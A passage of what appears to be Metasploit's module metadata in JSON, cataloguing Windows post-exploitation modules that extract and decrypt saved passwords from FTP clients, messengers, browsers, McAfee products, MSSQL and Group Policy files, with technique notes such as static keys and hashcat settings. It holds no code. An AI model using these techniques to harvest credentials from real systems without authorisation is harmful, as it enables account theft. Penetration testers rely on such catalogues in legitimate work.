"Windows Gather Google Picasa Password Extractor", - "fullname": "post/windows/gather/credentials/enum_picasa_pwds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Unknown", - "Sil3ntDre4m " - ], - "description": "This module extracts and decrypts the login passwords\n stored by Google Picasa.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/enum_picasa_pwds.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/enum_picasa_pwds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/epo_sql": { - "name": "Windows Gather McAfee ePO 4.6 Config SQL Credentials", - "fullname": "post/windows/gather/credentials/epo_sql", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Nathan Einwechter " - ], - "description": "This module extracts connection details and decrypts the saved password for the\n SQL database in use by a McAfee ePO 4.6 server. The passwords are stored in a\n config file. 
They are encrypted with AES-128-ECB and a static key.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/epo_sql.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/epo_sql", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/filezilla_server": { - "name": "Windows Gather FileZilla FTP Server Credential Collection", - "fullname": "post/windows/gather/credentials/filezilla_server", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "bannedit ", - "g0tmi1k" - ], - "description": "This module will collect credentials from the FileZilla FTP server if installed.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/filezilla_server.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/filezilla_server", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/flashfxp": { - "name": "Windows Gather FlashFXP Saved Password Extraction", - "fullname": "post/windows/gather/credentials/flashfxp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "theLightCosine " - ], - "description": "This module 
extracts weakly encrypted saved FTP Passwords from FlashFXP. It\n finds saved FTP connections in the Sites.dat file.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/flashfxp.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/flashfxp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/flock": { - "name": "Flock credential gatherer", - "fullname": "post/windows/gather/credentials/flock", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. 
Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials stored in Flock on a remote Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/flock.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/flock", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/ftpnavigator": { - "name": "Windows Gather FTP Navigator Saved Password Extraction", - "fullname": "post/windows/gather/credentials/ftpnavigator", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "theLightCosine " - ], - "description": "This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/ftpnavigator.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/ftpnavigator", - "check": false, - "post_auth": false, - "default_credential": false, - 
"notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/ftpx": { - "name": "Windows Gather FTP Explorer (FTPX) Credential Extraction", - "fullname": "post/windows/gather/credentials/ftpx", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "bcoles " - ], - "description": "This module finds saved login credentials for the FTP Explorer (FTPx)\n FTP client for Windows.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/ftpx.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/ftpx", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/gadugadu": { - "name": "Gadugadu credential gatherer", - "fullname": "post/windows/gather/credentials/gadugadu", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Gadugadu credentials on a Windows host. 
Gadu-Gadu is a Polish instant messaging client using a proprietary protocol. Gadu-Gadu was the most popular IM service in Poland.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/gadugadu.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/gadugadu", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/gpp": { - "name": "Windows Gather Group Policy Preference Saved Passwords", - "fullname": "post/windows/gather/credentials/gpp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Ben Campbell ", - "Loic Jaquemet ", - "scriptmonkey ", - "theLightCosine ", - "mubix " - ], - "description": "This module enumerates the victim machine's domain controller and\n connects to it via SMB. 
It then looks for Group Policy Preference XML\n files containing local user accounts and passwords and decrypts them\n using Microsofts public AES key.\n\n Cached Group Policy files may be found on end-user devices if the group\n policy object is deleted rather than unlinked.\n\n Tested on WinXP SP3 Client and Win2k8 R2 DC.", - "references": [ - "URL-http://msdn.microsoft.com/en-us/library/cc232604(v=prot.13)", - "URL-http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html", - "URL-http://blogs.technet.com/grouppolicy/archive/2009/04/22/passwords-in-group-policy-preferences-updated.aspx", - "URL-https://labs.portcullis.co.uk/blog/are-you-considering-using-microsoft-group-policy-preferences-think-again/", - "MSB-MS14-025" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/gpp.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/gpp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/halloy_irc": { - "name": "Halloy IRC credential gatherer", - "fullname": "post/windows/gather/credentials/halloy_irc", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jacob Tierney", - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. 
Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials stored on Halloy IRC Client in a windows remote host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/halloy_irc.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/halloy_irc", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/heidisql": { - "name": "Windows Gather HeidiSQL Saved Password Extraction", - "fullname": "post/windows/gather/credentials/heidisql", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "h0ng10" - ], - "description": "This module extracts saved passwords from the HeidiSQL client. These\n passwords are stored in the registry. 
They are encrypted with a custom algorithm.\n This module extracts and decrypts these passwords.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/heidisql.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/heidisql", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/icq": { - "name": "ICQ credential gatherer", - "fullname": "post/windows/gather/credentials/icq", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for ICQ credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/icq.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/icq", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - 
"session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/idm": { - "name": "Windows Gather Internet Download Manager (IDM) Password Extractor", - "fullname": "post/windows/gather/credentials/idm", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sil3ntdre4m ", - "Unknown" - ], - "description": "This module recovers the saved premium download account passwords from\n Internet Download Manager (IDM). These passwords are stored in an encoded\n format in the registry. This module traverses through these registry entries\n and decodes them. Thanks to the template code of theLightCosine's CoreFTP\n password module.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/idm.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/idm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/ie": { - "name": "Ie credential gatherer", - "fullname": "post/windows/gather/credentials/ie", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. 
Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for ie credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/ie.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/ie", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/imail": { - "name": "Windows Gather IPSwitch iMail User Data Enumeration", - "fullname": "post/windows/gather/credentials/imail", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sinn3r " - ], - "description": "This module will collect iMail user data such as the username, domain,\n full name, e-mail, and the decoded password. Please note if IMAILUSER is\n specified, the module extracts user data from all the domains found. 
If\n IMAILDOMAIN is specified, then it will extract all user data under that\n particular category.", - "references": [ - "EDB-11331" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/imail.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/imail", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/imvu": { - "name": "Windows Gather Credentials IMVU Game Client", - "fullname": "post/windows/gather/credentials/imvu", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Shubham Dawra " - ], - "description": "This module extracts account username & password from the IMVU game client\n and stores it as loot.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/imvu.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/imvu", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/incredimail": { - "name": "Incredimail credential gatherer", - "fullname": "post/windows/gather/credentials/incredimail", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim 
M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Incredimail credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/incredimail.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/incredimail", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/kakaotalk": { - "name": "KakaoTalk credential gatherer", - "fullname": "post/windows/gather/credentials/kakaotalk", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for KakaoTalk credentials on a Windows host. 
KakaoTalk is a popular mobile messaging app most widely used in South Korea.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/kakaotalk.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/kakaotalk", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/kmeleon": { - "name": "Kmeleon credential gatherer", - "fullname": "post/windows/gather/credentials/kmeleon", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for K-meleon credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/kmeleon.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/kmeleon", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - 
}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/line": { - "name": "LINE credential gatherer", - "fullname": "post/windows/gather/credentials/line", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials in LINE desktop application on a remote Windows host. LINE is the most popular Instant Messenger app in Japan.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/line.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/line", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/maxthon": { - "name": "Maxthon credential gatherer", - "fullname": "post/windows/gather/credentials/maxthon", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. 
Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Maxthon credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/maxthon.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/maxthon", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/mcafee_vse_hashdump": { - "name": "McAfee Virus Scan Enterprise Password Hashes Dump", - "fullname": "post/windows/gather/credentials/mcafee_vse_hashdump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Mike Manzotti ", - "Maurizio inode Agazzini" - ], - "description": "This module extracts the password hash from McAfee Virus Scan Enterprise (VSE)\n used to lock down the user interface. Hashcat supports cracking this type of\n hash using hash type sha1($salt.unicode($pass)) (-m 140) and a hex salt\n (--hex-salt) of 01000f000d003300 (unicode \"\\x01\\x0f\\x0d\\x33\"). 
A dynamic\n format is available for John the Ripper at the referenced URL.", - "references": [ - "URL-https://www.dionach.com/blog/disabling-mcafee-on-access-scanning" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/mcafee_vse_hashdump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/mdaemon_cred_collector": { - "name": "Windows Gather MDaemonEmailServer Credential Cracking", - "fullname": "post/windows/gather/credentials/mdaemon_cred_collector", - "aliases": [], - "rank": 600, - "disclosure_date": null, - "type": "post", - "author": [ - "Manuel Nader #AgoraSecurity" - ], - "description": "Finds and cracks the stored passwords of MDaemon Email Server.", - "references": [ - "BID-4686" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/gather/credentials/mdaemon_cred_collector.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/mdaemon_cred_collector", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/meebo": { - "name": "Windows Gather Meebo Password Extractor", - "fullname": "post/windows/gather/credentials/meebo", - 
"aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Sil3ntDre4m ", - "Unknown" - ], - "description": "This module extracts login account password stored by\n Meebo Notifier, a desktop version of Meebo's Online Messenger.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/meebo.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/meebo", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/miranda": { - "name": "Miranda credential gatherer", - "fullname": "post/windows/gather/credentials/miranda", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. 
Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Miranda credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/miranda.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/miranda", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/moba_xterm": { - "name": "Windows Gather MobaXterm Passwords", - "fullname": "post/windows/gather/credentials/moba_xterm", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kali-Team " - ], - "description": "This module will determine if MobaXterm is installed on the target system and, if it is, it will try to\n dump all saved session information from the target. 
The passwords for these saved sessions will then be decrypted\n where possible, using the decryption information that HyperSine reverse engineered.", - "references": [ - "URL-https://blog.kali-team.cn/Metasploit-MobaXterm-0b976b993c87401598be4caab8cbe0cd" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/windows/gather/credentials/moba_xterm.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/moba_xterm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/mremote": { - "name": "Windows Gather mRemote Saved Password Extraction", - "fullname": "post/windows/gather/credentials/mremote", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "theLightCosine ", - "hdm ", - "mubix " - ], - "description": "This module extracts saved passwords from mRemote. mRemote stores\n connections for RDP, VNC, SSH, Telnet, rlogin and other protocols. It saves\n the passwords in an encrypted format. 
The module will extract the connection\n info and decrypt the saved passwords.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/mremote.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/mremote", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/mssql_local_hashdump": { - "name": "Windows Gather Local SQL Server Hash Dump", - "fullname": "post/windows/gather/credentials/mssql_local_hashdump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Mike Manzotti ", - "nullbind" - ], - "description": "This module extracts the usernames and password\n hashes from an MSSQL server and stores them as loot. 
It uses the\n same technique in mssql_local_auth_bypass.", - "references": [ - "URL-https://www.dionach.com/blog/easily-grabbing-microsoft-sql-server-password-hashes" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/mssql_local_hashdump.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/mssql_local_hashdump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/navicat": { - "name": "Windows Gather Navicat Passwords", - "fullname": "post/windows/gather/credentials/navicat", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "HyperSine", - "Kali-Team " - ], - "description": "This module will find and decrypt stored Navicat passwords.", - "references": [ - "URL-https://github.com/HyperSine/how-does-navicat-encrypt-password", - "URL-https://blog.kali-team.cn/Metasploit-Navicat-fbc1390cf57c40b5b576584c48b8e125" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": 